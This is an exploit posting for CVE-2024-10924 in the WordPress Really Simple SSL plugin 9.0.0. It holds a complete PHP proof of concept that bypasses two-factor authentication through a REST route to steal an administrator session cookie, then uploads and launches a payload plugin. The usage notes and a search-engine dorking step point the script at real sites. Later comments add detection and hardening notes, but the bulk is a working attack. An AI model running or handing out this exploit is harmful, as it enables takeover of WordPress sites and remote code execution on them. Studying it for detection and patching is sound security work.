WordPress Really Simple SSL 9.0.0 Authentication Bypass
WordPress Really Simple SSL 9.0.0 Authentication Bypass
=============================================================================================================================================
| # Title : WordPress Really Simple SSL plugin v9.0.0 PHP Back Connect |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://wordpress.org/plugins/really-simple-ssl/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code description: Bypasses 2FA in WordPress, then uploads and launches a payload. The code supports all operating systems.

(Related: https://packetstorm.news/files/id/183035/ ; related CVE number: CVE-2024-10924.)

[+] Payload :

[+] Set Target : line 59

[+] Usage : php poc.php

[+] PayLoad :


<?php

/**
 * Reachability probe for the configured base URL.
 *
 * Fetches the response headers for $url and reports whether the first
 * status line contains the substring "200". Despite the name, nothing here
 * inspects the response for WordPress-specific markers; it only tells the
 * caller that the URL answered with a 200-style status line.
 *
 * Warnings from get_headers() are suppressed with "@", so a DNS or
 * connection failure surfaces only as a false return value.
 *
 * @param string $url Base URL to probe.
 * @return bool True when headers were received and the first line contains "200".
 */
function check_wordpress_site($url) {
    $statusLines = @get_headers($url);
    $gotHeaders = (bool) $statusLines;

    // Short-circuit keeps the index access from running when no headers came back.
    return $gotHeaders && strpos($statusLines[0], '200') !== false;
}

/**
 * Issues the request pattern this write-up associates with CVE-2024-10924.
 *
 * Sends one JSON POST to the Really Simple SSL REST route
 * reallysimplessl/v1/two_fa/skip_onboarding (addressed through the
 * ?rest_route= query form) carrying a user_id, a login_nonce and a
 * redirect_to value, then searches the string returned by curl_exec() for a
 * "wordpress_logged_in_<32 hex chars>=<value>" cookie pair.
 *
 * Defender notes:
 * - Detection: look in web-server / WAF logs for POST requests whose query
 *   string contains rest_route=/reallysimplessl/v1/two_fa/skip_onboarding.
 *   WordPress also exposes REST routes under /wp-json/, so the same route
 *   may appear as /wp-json/reallysimplessl/v1/two_fa/skip_onboarding.
 *   Requests to this route that are not preceded by an interactive login
 *   from the same client deserve review.
 * - Mitigation: update the plugin to a release the vendor lists as fixing
 *   CVE-2024-10924. If exposure is suspected, invalidate existing sessions
 *   and audit administrator accounts and installed plugins.
 *
 * @param string $target  Base URL of the site (no trailing query string).
 * @param int    $user_id Numeric WordPress user ID placed in the JSON body.
 * @return string|false The matched cookie pair, or false when the request
 *                      returned nothing or no cookie pair was found.
 */
function bypass_2fa($target, $user_id) {
// The nonce is generated locally rather than obtained from the site, so the
// request can only be honoured by an endpoint that does not enforce nonce
// validation. NOTE(review): that matches the public description of
// CVE-2024-10924; confirm against the vendor advisory.
$login_nonce = rand(1000000000, 9999999999);
// Request body: the three JSON keys below are the recognisable shape of this
// request and are useful as a body-inspection signature.
$data = json_encode([
'user_id' => $user_id,
'login_nonce' => $login_nonce,
'redirect_to' => '/wp-admin/'
]);

$url = "$target?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
curl_close($ch);

// curl_exec() returns false on transport failure; an empty body is treated
// the same way.
if (!$response) {
return false;
}

// Only the first capture group (the full name=value cookie pair) is returned.
preg_match('/(wordpress_logged_in_[a-f0-9]{32}=[^;]+)/', $response, $matches);
return $matches[1] ?? false;
}

/**
 * Posts a plugin archive to the WordPress plugin-upload handler using a
 * supplied session cookie.
 *
 * Builds a multipart POST to /wp-admin/update.php?action=upload-plugin with
 * three fields: pluginzip (a file read from "<plugin_name>.zip" relative to
 * the current working directory), _wpnonce (the literal string
 * 'random_nonce') and install-plugin-submit. The result is judged solely by
 * whether the response body contains "Plugin installed successfully".
 *
 * Defender notes:
 * - This is the ordinary dashboard plugin-install path, so once a session is
 *   obtained the traffic resembles legitimate administrator activity.
 *   Correlate POSTs to update.php?action=upload-plugin with how the session
 *   was established, and alert on new directories under wp-content/plugins.
 * - Hardening: defining DISALLOW_FILE_MODS in wp-config.php disables plugin
 *   and theme installation from the dashboard, which limits what a stolen
 *   or forged administrator session can do. File-integrity monitoring on
 *   wp-content/plugins catches the write itself.
 *
 * @param string $target       Base URL of the site.
 * @param string $admin_cookie Cookie pair sent verbatim in the Cookie header.
 * @param string $plugin_name  Base name of the local .zip file to send.
 * @param string $payload_name Not referenced anywhere in this function.
 * @return bool True when the success phrase appears in the response body.
 */
function upload_payload($target, $admin_cookie, $plugin_name, $payload_name) {
// Relative path: resolved against the directory the script is run from.
$zip_path = "$plugin_name.zip";

$url = "$target/wp-admin/update.php?action=upload-plugin";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Cookie: ' . $admin_cookie,
'Content-Type: multipart/form-data'
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'pluginzip' => new CURLFile($zip_path),
'_wpnonce' => 'random_nonce',
'install-plugin-submit' => 'Install Now'
]);

$response = curl_exec($ch);
curl_close($ch);

// Success is inferred from a phrase in the returned page, not from the HTTP
// status code.
return strpos($response, 'Plugin installed successfully') !== false;
}

// Driver: runs the three steps in order and stops at the first failure.
// $target is a placeholder base URL; $user_id is the numeric account ID sent
// in the bypass request (ID 1 is typically the first account created on a
// WordPress install; confirm per site when assessing exposure).
$target = "http://target.com";
$user_id = 1;

// Step 1: reachability check only (status line contains "200").
if (!check_wordpress_site($target)) {
die("WordPress site is not online.\n");
}

// Step 2: request against the two_fa/skip_onboarding REST route.
$admin_cookie = bypass_2fa($target, $user_id);
if (!$admin_cookie) {
die("Failed to bypass 2FA.\n");
}

// Both names are "wp_" / "ajax_" followed by five hex characters taken from
// an MD5 of mt_rand(). Because the suffix changes per run, hunting should
// key on the prefix-plus-five-hex pattern and on recently created plugin
// directories rather than on a fixed name.
$plugin_name = "wp_" . substr(md5(mt_rand()), 0, 5);
$payload_name = "ajax_" . substr(md5(mt_rand()), 0, 5);

// Step 3: plugin-upload request using the cookie from step 2.
if (!upload_payload($target, $admin_cookie, $plugin_name, $payload_name)) {
die("Failed to upload payload.\n");
}

// Prints the expected location under wp-content/plugins; this line only
// echoes a string and sends no further request.
echo "Payload executed at $target/wp-content/plugins/$plugin_name/$payload_name.php\n";


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================